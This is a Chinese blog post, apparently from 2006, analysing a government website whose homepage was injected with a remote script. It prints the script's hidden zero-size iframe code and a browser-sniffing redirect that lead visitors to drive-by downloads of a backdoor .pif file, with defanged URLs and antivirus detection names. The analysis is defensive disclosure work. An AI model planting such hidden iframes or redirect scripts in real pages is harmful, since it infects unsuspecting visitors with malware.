病毒网站,又一个自动下载病毒的政府网站(第3版)

又一个自动下载病毒的政府网站(第3版) - 电脑安全 - 电脑教程网

又一个自动下载病毒的政府网站(第3版)

日期:2006-10-14   荐:

endurer 原创

2006-02-15 第3版 瑞星将xxxxx.pif 报为:Backdoor.Gpigeon.vhq,卡巴斯基将xxxxx.pif 报为:Backdoor.Win32.Hupigon.lz2006-02-10 第2版 江民KV2006将xxxxx.pif 报为:Backdoor/Huigezi.cbf2006-02-09 第1

今天又发现一个被被加入自动下载病毒文件的代码的政府网站,其手法与 某政府网站被加入的自动下载病毒文件的代码变了花样 相同,但自动下载的病毒“升级”了。

在该网站首页,仍是使用:

<script src=hxxp://www.****tour5166.com/tour/Check.js></script>

来引入文件Check.js。

而且这个Check.js的内容未变,为:

document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");

其中:

hxxp://whc330330.***go.3322.org被hxxp://www.3322.org的管理员关闭。

hxxp://www.***csedu.gov.cn/workOA/good/index.htm

的内容为:

<iframe src="hxxp://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie='fucksnow';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='nt';if(!(ver.indexOf('Windows 98')==-1)){ie='98';}location.href=ie '.htm';</script>

该脚本会根据浏览器和Windows版本的不同,自动下载

hxxp://www.***csedu.gov.cn/workOA/good/fucksnow.htm

hxxp://www.***csedu.gov.cn/workOA/good/nt.htm

hxxp://www.***csedu.gov.cn/workOA/good/98.htm

在打开这三个网页文件时自动下载的文件名未变,仍是:

1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif

2. hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif

3. hxxp://***.****xuemulove.com/a.gif(可能已不存在,未能获取)

其中3.hxxp://***.****xuemulove.com/a.gif,仍然未能获取。

而1.和2.的文件长度变了,瑞星和江民均未报,http://virusscan.jotti.org/上的各扫描引擎也不报,但status为POSSIBLY INFECTED/MALWARE。

*2006-02-11补充:江民KV2006将xxxxx.pif 报为:Backdoor/Huigezi.cbf

*2006-02-15补充:瑞星将xxxxx.pif 报为:Backdoor.Gpigeon.vhq,卡巴斯基将xxxxx.pif 报为:Backdoor.Win32.Hupigon.lz

标签: